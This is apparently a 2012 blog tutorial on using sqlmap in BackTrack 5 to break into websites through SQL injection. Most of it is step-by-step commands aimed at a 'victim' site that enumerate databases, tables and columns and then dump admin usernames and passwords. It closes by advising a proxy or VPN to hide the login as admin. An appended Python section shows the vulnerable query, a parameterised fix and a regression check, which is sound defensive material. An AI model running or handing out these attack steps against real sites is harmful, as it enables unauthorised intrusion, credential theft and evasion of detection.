Thursday, 29 November 2012

Hack website using Backtrack (sqlmap)

In my previous tutorial I explained what BackTrack is; in this tutorial I am going to show you how to hack a website using BackTrack 5 (sqlmap). Sqlmap is an automatic SQL injection tool which helps you to hack a website easily. Follow these simple steps to hack a website using the BackTrack 5 sqlmap tool.

1. Open your BackTrack terminal, type cd /pentest/database/sqlmap and hit Enter. Now sqlmap is open in your terminal.
[Image: sql map 1]
2. Now find the vulnerable site. (Well, I already have a vulnerable site.)
[Image: sql map 2]
3. Now type this command in the terminal and hit Enter. (Refer to the figure above.)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 --dbs

4. Now you will get the database names of the website.
[Image: sql map 3]
Well, I got two databases, aj and information_schema; we will select the aj database.

5. Now get the tables of that database. For that, enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) --tables

6. Now we need to grab the tables from the aj database. Paste the command below and hit Enter.
python sqlmap.py -u http://www.yourvictim' -D aj --tables

[Image: sql map 4]
7. Now you will get the list of tables stored in the aj database.
[Image: sql map 5]

8. Now let's grab the columns from the admin table.
python sqlmap.py -u http://www.yourvictim' -T admin --columns
[Image: sql map 7]
Now we have the columns, and among them username and password.
9. Now let's grab the passwords of the admin.
python sqlmap.py -u http://www.yourvictim' -T admin -U test --dump
Now we have the username and the password of the website!
[Image: sql map 9]
Now just find the admin panel of the website, and use a proxy/VPN when you are trying to log in to the website as an admin.
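
Why a parameter like the id=4 in the steps above is injectable, and what the fix looks like in code, as an added example that is not part of the original post. The function names, the articles table and the use of SQLite in place of the site's own database are assumptions made for illustration; the sample rows are constructed.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO articles VALUES (4, 'Welcome'), (5, 'News');
    """)
    return conn


def get_article_vulnerable(conn, raw_id):
    # The request value is pasted into the SQL text, so whatever follows the
    # number is parsed as SQL and can change the structure of the query.
    sql = "SELECT id, title FROM articles WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def get_article_hardened(conn, raw_id):
    # 1. Allow-list validation: only a plain ASCII decimal integer is accepted.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    # 2. Parameter binding: the value is sent as data and never parsed as SQL.
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def is_injectable(lookup, conn):
    """Regression check for a lookup function: does appending an always-true
    versus an always-false condition to the id change what comes back?"""
    try:
        return lookup(conn, "4 AND 1=1") != lookup(conn, "4 AND 1=2")
    except ValueError:
        return False  # input was rejected before it reached the database


if __name__ == "__main__":
    db = make_db()
    print("string-built query injectable:", is_injectable(get_article_vulnerable, db))
    print("validated + bound query injectable:", is_injectable(get_article_hardened, db))
```

The same check can be kept as a unit test for every handler that reads an id from the request, so a regression back to string-built SQL fails the build.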
